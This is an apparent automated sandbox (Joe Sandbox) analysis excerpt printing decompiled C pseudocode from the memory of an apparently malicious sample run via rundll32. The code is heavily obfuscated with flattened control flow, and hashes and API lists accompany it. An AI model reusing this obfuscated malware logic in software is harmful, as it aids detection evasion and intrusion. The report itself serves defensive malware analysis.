                                                                                                                    							_t345 = E0034E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                    							_t425 =  &(_t425[0xb]);
                                                                                                                    							if(_t345 == 0) {
                                                                                                                    								_t414 = 0x54d1846;
                                                                                                                    								_t367 = 0x2db8754;
                                                                                                                    							} else {
                                                                                                                    								_t367 = 0xcdb2e90;
                                                                                                                    							}
                                                                                                                    							while(1) {
                                                                                                                    								L1:
                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                    								goto L2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t367 == 0xcdb2e90) {
                                                                                                                    							_t347 = E00335548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                    							_t425 =  &(_t425[4]);
                                                                                                                    							if(_t347 == 0) {
                                                                                                                    								_t414 = 0x54d1846;
                                                                                                                    							} else {
                                                                                                                    								_t414 = 0xa80516a;
                                                                                                                    								_t364 = 1;
                                                                                                                    							}
                                                                                                                    							_t367 = 0x70f4b52;
                                                                                                                    							while(1) {
                                                                                                                    								L1:
                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                    								goto L2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t367 != 0xea9523f) {
                                                                                                                    							goto L34;
                                                                                                                    						}
                                                                                                                    						_t349 = E0033CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                    						_t425 =  &(_t425[5]);
                                                                                                                    						if(_t349 == 0) {
                                                                                                                    							goto L37;
                                                                                                                    						}
                                                                                                                    						_t367 = 0x47b49b8;
                                                                                                                    						goto L1;
                                                                                                                    						L34:
                                                                                                                    					} while (_t367 != 0xa80516a);
                                                                                                                    					goto L37;
                                                                                                                    				}
                                                                                                                    			}

                                                                                                                    0x003367e7
                                                                                                                    0x003367ef
                                                                                                                    0x003367f7
                                                                                                                    0x003367ff
                                                                                                                    0x00336804
                                                                                                                    0x0033680c
                                                                                                                    0x00336814
                                                                                                                    0x0033681c
                                                                                                                    0x00336824
                                                                                                                    0x00336829
                                                                                                                    0x00336831
                                                                                                                    0x00336839
                                                                                                                    0x00336841
                                                                                                                    0x00336846
                                                                                                                    0x0033684e
                                                                                                                    0x00336856
                                                                                                                    0x0033685e
                                                                                                                    0x00336863
                                                                                                                    0x0033686b
                                                                                                                    0x00336873
                                                                                                                    0x0033687d
                                                                                                                    0x00336881
                                                                                                                    0x00336889
                                                                                                                    0x00336899
                                                                                                                    0x003368a1
                                                                                                                    0x003368a6
                                                                                                                    0x003368b0
                                                                                                                    0x003368b3
                                                                                                                    0x003368b7
                                                                                                                    0x003368bb
                                                                                                                    0x003368c3
                                                                                                                    0x003368c7
                                                                                                                    0x003368d2
                                                                                                                    0x003368dd
                                                                                                                    0x003368e8
                                                                                                                    0x003368f5
                                                                                                                    0x003368f9
                                                                                                                    0x00336901
                                                                                                                    0x00336909
                                                                                                                    0x0033690e
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336923
                                                                                                                    0x00336a56
                                                                                                                    0x00336a5b
                                                                                                                    0x00336a6d
                                                                                                                    0x00336a72
                                                                                                                    0x00336a73
                                                                                                                    0x00336a75
                                                                                                                    0x00336a7a
                                                                                                                    0x00336a7d
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033692f
                                                                                                                    0x00336a16
                                                                                                                    0x00336a25
                                                                                                                    0x00336a3d
                                                                                                                    0x00336a43
                                                                                                                    0x00336bc8
                                                                                                                    0x00336bc8
                                                                                                                    0x00000000
                                                                                                                    0x00336bc8
                                                                                                                    0x0033693b
                                                                                                                    0x003369d8
                                                                                                                    0x003369da
                                                                                                                    0x003369df
                                                                                                                    0x003369e6
                                                                                                                    0x003369ed
                                                                                                                    0x003369f4
                                                                                                                    0x003369fd
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336947
                                                                                                                    0x00336999
                                                                                                                    0x003369a9
                                                                                                                    0x0033699b
                                                                                                                    0x0033699b
                                                                                                                    0x0033699b
                                                                                                                    0x003369ae
                                                                                                                    0x003369b7
                                                                                                                    0x003369bc
                                                                                                                    0x00000000
                                                                                                                    0x003369bc
                                                                                                                    0x0033694f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336955
                                                                                                                    0x0033695e
                                                                                                                    0x00336960
                                                                                                                    0x00336963
                                                                                                                    0x00336966
                                                                                                                    0x0033696b
                                                                                                                    0x00336970
                                                                                                                    0x00336970
                                                                                                                    0x00336973
                                                                                                                    0x0033697a
                                                                                                                    0x00336bdb
                                                                                                                    0x00336be1
                                                                                                                    0x00336be8
                                                                                                                    0x00336bf1
                                                                                                                    0x00336980
                                                                                                                    0x00336980
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033697a
                                                                                                                    0x00336a8d
                                                                                                                    0x00336bbd
                                                                                                                    0x00336bc3
                                                                                                                    0x00000000
                                                                                                                    0x00336bc3
                                                                                                                    0x00336a99
                                                                                                                    0x00336b34
                                                                                                                    0x00336b4c
                                                                                                                    0x00336b7d
                                                                                                                    0x00336b89
                                                                                                                    0x00336b8e
                                                                                                                    0x00336b93
                                                                                                                    0x00336b9f
                                                                                                                    0x00336ba4
                                                                                                                    0x00336b95
                                                                                                                    0x00336b95
                                                                                                                    0x00336b95
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336aa5
                                                                                                                    0x00336b0f
                                                                                                                    0x00336b14
                                                                                                                    0x00336b19
                                                                                                                    0x00336b25
                                                                                                                    0x00336b1b
                                                                                                                    0x00336b1d
                                                                                                                    0x00336b22
                                                                                                                    0x00336b22
                                                                                                                    0x00336b2a
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336aad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336ad6
                                                                                                                    0x00336adb
                                                                                                                    0x00336ae0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336ae6
                                                                                                                    0x00000000
                                                                                                                    0x00336bcd
                                                                                                                    0x00336bcd
                                                                                                                    0x00000000
                                                                                                                    0x00336bd9

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                    • API String ID: 0-2895984816
                                                                                                                    • Opcode ID: 72f910718383cc35cf534728289548bd09a59de76b7c065a4397717d8d4b5dbf
                                                                                                                    • Instruction ID: bb1f54a4f29ce5ca317d7d44b24e878a2ae1e84e8b36abfaa7f535f034d846f9
                                                                                                                    • Opcode Fuzzy Hash: 72f910718383cc35cf534728289548bd09a59de76b7c065a4397717d8d4b5dbf
                                                                                                                    • Instruction Fuzzy Hash: AE0246725083809FC7A5CF65C58AA5BBBE1FBC4358F20890DF5DA8A260C7B4D949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                    • CharUpperA.USER32 ref: 10021943
                                                                                                                    • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249967234-0
                                                                                                                    • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                    • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                    • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                    • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00335E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				char _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				void* _t339;
                                                                                                                    				intOrPtr _t372;
                                                                                                                    				void* _t374;
                                                                                                                    				intOrPtr _t381;
                                                                                                                    				intOrPtr _t382;
                                                                                                                    				void* _t384;
                                                                                                                    				intOrPtr* _t385;
                                                                                                                    				void* _t387;
                                                                                                                    				intOrPtr _t421;
                                                                                                                    				intOrPtr* _t423;
                                                                                                                    				signed int _t424;
                                                                                                                    				signed int _t425;
                                                                                                                    				signed int _t426;
                                                                                                                    				signed int _t427;
                                                                                                                    				signed int _t428;
                                                                                                                    				signed int _t429;
                                                                                                                    				signed int _t430;
                                                                                                                    				signed int _t431;
                                                                                                                    				signed int _t432;
                                                                                                                    				signed int _t433;
                                                                                                                    				signed int _t434;
                                                                                                                    				signed int* _t437;
                                                                                                                    
                                                                                                                    				_t385 = _a8;
                                                                                                                    				_push(_t385);
                                                                                                                    				_push(_a4);
                                                                                                                    				_t423 = __ecx;
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t339);
                                                                                                                    				_v12 = 0xbcdf6a;
                                                                                                                    				_t437 =  &(( &_v148)[4]);
                                                                                                                    				_t421 = 0;
                                                                                                                    				_v8 = 0;
                                                                                                                    				_t387 = 0xc04f77e;
                                                                                                                    				_v92 = 0x11f6ef;
                                                                                                                    				_v92 = _v92 + 0xffffb184;
                                                                                                                    				_t424 = 0x71;
                                                                                                                    				_v92 = _v92 / _t424;
                                                                                                                    				_t425 = 0x24;
                                                                                                                    				_v92 = _v92 / _t425;
                                                                                                                    				_v92 = _v92 ^ 0x0000011d;
                                                                                                                    				_v56 = 0xfaa796;
                                                                                                                    				_v56 = _v56 >> 0xc;
                                                                                                                    				_v56 = _v56 << 0xa;
                                                                                                                    				_v56 = _v56 ^ 0x003ea801;
                                                                                                                    				_v36 = 0x1650e4;
                                                                                                                    				_v36 = _v36 + 0xce7;
                                                                                                                    				_v36 = _v36 ^ 0x00165dcb;
                                                                                                                    				_v116 = 0x54bb44;
                                                                                                                    				_v116 = _v116 + 0xffff1cdd;
                                                                                                                    				_v116 = _v116 + 0xffffa99d;
                                                                                                                    				_v116 = _v116 + 0xa8e5;
                                                                                                                    				_v116 = _v116 ^ 0x00542aa3;
                                                                                                                    				_v148 = 0xce1ee6;
                                                                                                                    				_v148 = _v148 ^ 0xff8bbe67;
                                                                                                                    				_v148 = _v148 | 0x521cb43f;
                                                                                                                    				_v148 = _v148 << 1;
                                                                                                                    				_v148 = _v148 ^ 0xfebb697e;
                                                                                                                    				_v52 = 0xc2bf1c;
                                                                                                                    				_v52 = _v52 << 0xc;
                                                                                                                    				_t426 = 0x73;
                                                                                                                    				_v52 = _v52 / _t426;
                                                                                                                    				_v52 = _v52 ^ 0x0061d2eb;
                                                                                                                    				_v88 = 0x8d6fba;
                                                                                                                    				_v88 = _v88 * 0x6a;
                                                                                                                    				_v88 = _v88 * 0x21;
                                                                                                                    				_v88 = _v88 >> 0xb;
                                                                                                                    				_v88 = _v88 ^ 0x00119314;
                                                                                                                    				_v48 = 0xec8dbc;
                                                                                                                    				_v48 = _v48 + 0xffff0a61;
                                                                                                                    				_v48 = _v48 | 0x0a9d8147;
                                                                                                                    				_v48 = _v48 ^ 0x0affcc17;
                                                                                                                    				_v24 = 0xd16d2c;
                                                                                                                    				_v24 = _v24 >> 2;
                                                                                                                    				_v24 = _v24 ^ 0x003dd5e6;
                                                                                                                    				_v124 = 0xaffa28;
                                                                                                                    				_v124 = _v124 >> 9;
                                                                                                                    				_v124 = _v124 * 9;
                                                                                                                    				_v124 = _v124 ^ 0x3775f33c;
                                                                                                                    				_v124 = _v124 ^ 0x377a4e54;
                                                                                                                    				_v76 = 0x9eb952;
                                                                                                                    				_v76 = _v76 >> 0xd;
                                                                                                                    				_v76 = _v76 << 0xa;
                                                                                                                    				_v76 = _v76 ^ 0x00160abd;
                                                                                                                    				_v108 = 0x8bec79;
                                                                                                                    				_t427 = 0x28;
                                                                                                                    				_v108 = _v108 * 0x30;
                                                                                                                    				_v108 = _v108 + 0xffff86d5;
                                                                                                                    				_v108 = _v108 + 0xffff5405;
                                                                                                                    				_v108 = _v108 ^ 0x1a3a719b;
                                                                                                                    				_v132 = 0x74267e;
                                                                                                                    				_v132 = _v132 + 0x1b76;
                                                                                                                    				_v132 = _v132 << 4;
                                                                                                                    				_v132 = _v132 + 0xffff1414;
                                                                                                                    				_v132 = _v132 ^ 0x074c11a2;
                                                                                                                    				_v100 = 0x4236e1;
                                                                                                                    				_v100 = _v100 ^ 0x96e608d5;
                                                                                                                    				_v100 = _v100 / _t427;
                                                                                                                    				_t428 = 0x2d;
                                                                                                                    				_v100 = _v100 * 0x6c;
                                                                                                                    				_v100 = _v100 ^ 0x96bd808a;
                                                                                                                    				_v84 = 0xb83730;
                                                                                                                    				_v84 = _v84 + 0xffffd15d;
                                                                                                                    				_v84 = _v84 >> 0xb;
                                                                                                                    				_v84 = _v84 ^ 0x0009ec33;
                                                                                                                    				_v140 = 0x532b06;
                                                                                                                    				_v140 = _v140 ^ 0xb0124270;
                                                                                                                    				_v140 = _v140 << 1;
                                                                                                                    				_v140 = _v140 / _t428;
                                                                                                                    				_v140 = _v140 ^ 0x02279f8d;
                                                                                                                    				_v44 = 0x33dfa;
                                                                                                                    				_v44 = _v44 + 0x1c37;
                                                                                                                    				_v44 = _v44 ^ 0x000817ba;
                                                                                                                    				_v136 = 0x1bf887;
                                                                                                                    				_v136 = _v136 ^ 0x189cf430;
                                                                                                                    				_v136 = _v136 + 0xffff0896;
                                                                                                                    				_v136 = _v136 ^ 0xf213b32f;
                                                                                                                    				_v136 = _v136 ^ 0xea9313b1;
                                                                                                                    				_v144 = 0xffa314;
                                                                                                                    				_v144 = _v144 >> 7;
                                                                                                                    				_v144 = _v144 ^ 0x35f9e2de;
                                                                                                                    				_t429 = 0x1f;
                                                                                                                    				_v144 = _v144 * 0x5b;
                                                                                                                    				_v144 = _v144 ^ 0x2f3e99d8;
                                                                                                                    				_v68 = 0x41f910;
                                                                                                                    				_v68 = _v68 / _t429;
                                                                                                                    				_v68 = _v68 ^ 0x28681de5;
                                                                                                                    				_v68 = _v68 ^ 0x2865ac71;
                                                                                                                    				_v96 = 0x6e33;
                                                                                                                    				_v96 = _v96 << 4;
                                                                                                                    				_v96 = _v96 ^ 0xe7b8475a;
                                                                                                                    				_v96 = _v96 << 1;
                                                                                                                    				_v96 = _v96 ^ 0xcf7b3a2b;
                                                                                                                    				_v104 = 0xedfca3;
                                                                                                                    				_t430 = 0x5e;
                                                                                                                    				_v104 = _v104 * 0x5f;
                                                                                                                    				_v104 = _v104 | 0x0b07679d;
                                                                                                                    				_v104 = _v104 ^ 0xc050dc4c;
                                                                                                                    				_v104 = _v104 ^ 0x9b058770;
                                                                                                                    				_v112 = 0xe25509;
                                                                                                                    				_v112 = _v112 ^ 0xf6d0fdca;
                                                                                                                    				_v112 = _v112 / _t430;
                                                                                                                    				_v112 = _v112 ^ 0x02984cdf;
                                                                                                                    				_v40 = 0xf7137d;
                                                                                                                    				_v40 = _v40 << 8;
                                                                                                                    				_v40 = _v40 ^ 0xf71f8dee;
                                                                                                                    				_v64 = 0x5508e8;
                                                                                                                    				_v64 = _v64 << 4;
                                                                                                                    				_v64 = _v64 | 0x94c676b5;
                                                                                                                    				_v64 = _v64 ^ 0x95dffb87;
                                                                                                                    				_v120 = 0xc732ae;
                                                                                                                    				_t431 = 0x75;
                                                                                                                    				_v120 = _v120 / _t431;
                                                                                                                    				_v120 = _v120 << 7;
                                                                                                                    				_t432 = 0x2c;
                                                                                                                    				_v120 = _v120 / _t432;
                                                                                                                    				_v120 = _v120 ^ 0x000601dd;
                                                                                                                    				_v72 = 0x179b9;
                                                                                                                    				_v72 = _v72 >> 1;
                                                                                                                    				_v72 = _v72 << 0xb;
                                                                                                                    				_v72 = _v72 ^ 0x05ec7a60;
                                                                                                                    				_v28 = 0x46261b;
                                                                                                                    				_t433 = 0x35;
                                                                                                                    				_v28 = _v28 / _t433;
                                                                                                                    				_v28 = _v28 ^ 0x000e773f;
                                                                                                                    				_v128 = 0xfd046c;
                                                                                                                    				_v128 = _v128 << 1;
                                                                                                                    				_v128 = _v128 << 3;
                                                                                                                    				_v128 = _v128 + 0xffff42a9;
                                                                                                                    				_v128 = _v128 ^ 0x0fc89804;
                                                                                                                    				_v60 = 0xb39cb2;
                                                                                                                    				_v60 = _v60 + 0xffffa360;
                                                                                                                    				_v60 = _v60 ^ 0x6e5a7866;
                                                                                                                    				_v60 = _v60 ^ 0x6eef17c9;
                                                                                                                    				_v32 = 0xb015d5;
                                                                                                                    				_t434 = 0x33;
                                                                                                                    				_v32 = _v32 / _t434;
                                                                                                                    				_v32 = _v32 ^ 0x00082471;
                                                                                                                    				_v80 = 0x87b3ae;
                                                                                                                    				_v80 = _v80 + 0xffffe530;
                                                                                                                    				_v80 = _v80 << 2;
                                                                                                                    				_v80 = _v80 ^ 0x021b575c;
                                                                                                                    				while(_t387 != 0x5e373ec) {
                                                                                                                    					if(_t387 == 0x87b20b3) {
                                                                                                                    						_t372 =  *0x353dfc; // 0x0
                                                                                                                    						_t374 = E0033CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
                                                                                                                    						_t437 =  &(_t437[0x12]);
                                                                                                                    						if(_t374 == _v88) {
                                                                                                                    							 *_t385 = _v20;
                                                                                                                    							_t421 = 1;
                                                                                                                    							 *((intOrPtr*)(_t385 + 4)) = _v16;
                                                                                                                    						} else {
                                                                                                                    							_t387 = 0x5e373ec;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						if(_t387 == 0xc04f77e) {
                                                                                                                    							_t387 = 0xd382560;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t387 == 0xc68a5f7) {
                                                                                                                    								_push(_t387);
                                                                                                                    								_push(_t387);
                                                                                                                    								_t381 = E00337FF2(_v16);
                                                                                                                    								_v20 = _t381;
                                                                                                                    								if(_t381 != 0) {
                                                                                                                    									_t387 = 0x87b20b3;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t387 != 0xd382560) {
                                                                                                                    									L14:
                                                                                                                    									if(_t387 != 0x4d23f0b) {
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_t382 =  *0x353dfc; // 0x0
                                                                                                                    									_t384 = E0033CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                    									_t437 =  &(_t437[0x12]);
                                                                                                                    									if(_t384 == _v148) {
                                                                                                                    										_t387 = 0xc68a5f7;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t421;
                                                                                                                    				}
                                                                                                                    				E00348519(_v32, _v80, _v20);
                                                                                                                    				_t387 = 0x4d23f0b;
                                                                                                                    				goto L14;
                                                                                                                    			}





























































                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                    • API String ID: 0-1604698900
                                                                                                                    • Opcode ID: 1a5d96de5c87f2e57039ac73138e36b82d84e1c7c6d04bca6fd711733bca8d25
                                                                                                                    • Instruction ID: d773339c1f922cb401703196ea098bb2957b424f25b9e93789845295d20652fc
                                                                                                                    • Opcode Fuzzy Hash: 1a5d96de5c87f2e57039ac73138e36b82d84e1c7c6d04bca6fd711733bca8d25
                                                                                                                    • Instruction Fuzzy Hash: BDF10E715087449FD369CF66D58AA4BFBF1FB84B48F10891DF29A86260D7B28949CF03
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Version$ClipboardFormatRegister
                                                                                                                    • String ID: MSWHEEL_ROLLMSG
                                                                                                                    • API String ID: 2888461884-2485103130
                                                                                                                    • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                    • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                    • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                    • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0034CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				intOrPtr _v1564;
                                                                                                                    				intOrPtr _v1568;
                                                                                                                    				intOrPtr _v1572;
                                                                                                                    				signed int _v1576;
                                                                                                                    				signed int _v1580;
                                                                                                                    				signed int _v1584;
                                                                                                                    				signed int _v1588;
                                                                                                                    				signed int _v1592;
                                                                                                                    				signed int _v1596;
                                                                                                                    				signed int _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				signed int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _v1684;
                                                                                                                    				signed int _v1688;
                                                                                                                    				signed int _v1692;
                                                                                                                    				signed int _v1696;
                                                                                                                    				signed int _v1700;
                                                                                                                    				signed int _v1704;
                                                                                                                    				signed int _v1708;
                                                                                                                    				void* _t341;
                                                                                                                    				void* _t370;
                                                                                                                    				void* _t379;
                                                                                                                    				intOrPtr _t382;
                                                                                                                    				intOrPtr _t385;
                                                                                                                    				void* _t396;
                                                                                                                    				intOrPtr _t399;
                                                                                                                    				intOrPtr _t436;
                                                                                                                    				signed int _t437;
                                                                                                                    				signed int _t438;
                                                                                                                    				signed int _t439;
                                                                                                                    				signed int _t440;
                                                                                                                    				signed int _t441;
                                                                                                                    				signed int _t442;
                                                                                                                    				signed int _t443;
                                                                                                                    				signed int _t444;
                                                                                                                    				signed int* _t449;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_t436 = 0;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(0);
                                                                                                                    				E003420B9(_t341);
                                                                                                                    				_v1572 = 0xe82680;
                                                                                                                    				_t449 =  &(( &_v1708)[5]);
                                                                                                                    				_v1568 = 0;
                                                                                                                    				_v1564 = 0;
                                                                                                                    				_t396 = 0x9368da1;
                                                                                                                    				_v1584 = 0x42403b;
                                                                                                                    				_v1584 = _v1584 + 0xffffd771;
                                                                                                                    				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                    				_v1692 = 0xc00255;
                                                                                                                    				_t437 = 0x16;
                                                                                                                    				_v1692 = _v1692 / _t437;
